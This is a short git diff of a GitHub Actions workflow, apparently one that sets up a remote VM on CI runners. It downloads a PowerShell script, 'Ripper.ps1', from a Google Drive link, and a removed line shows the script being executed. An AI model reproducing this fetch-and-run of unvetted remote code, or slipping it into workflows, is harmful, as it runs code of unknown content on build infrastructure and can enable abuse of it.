--- a/.github/workflows/ShadowRipper99.yml
+++ b/.github/workflows/ShadowRipper99.yml
@@ -20,8 +20,7 @@ jobs:
     - name: Fetching Required Scripts...
       run: |
         # Please wait for a few minutes while the setup initializes completely...
-        Invoke-WebRequest -Uri "https://drive.usercontent.google.com/download?id=1W0Mz7cL1abVNt6QZEVttBzX7Q52QVh2T&export=download&authuser=0&confirm=t&uuid=fdbceb6f-1b4d-49c1-9128-d38cf855055b&at=APZUnTVUm1AGqItiY6LCUoXfH13d%3A1716612457921" -OutFile "Ripper.ps1"
-        ./Ripper.ps1
+        Invoke-WebRequest -Uri "https://drive.usercontent.google.com/download?id=1W0Mz7cL1abVNt6QZEVttBzX7Q52QVh2T&export=download&authuser=0&confirm=t&uuid=fdbceb6f-1b4d-49c1-9128-d38cf855055b&at=APZUnTVUm1AGqItiY6LCUoXfH13d%3A1716612457921" -OutFile "Ripper.ps1".
     - name: Starting VM...
       run: |
         # Running The Script With PIN Authentication...
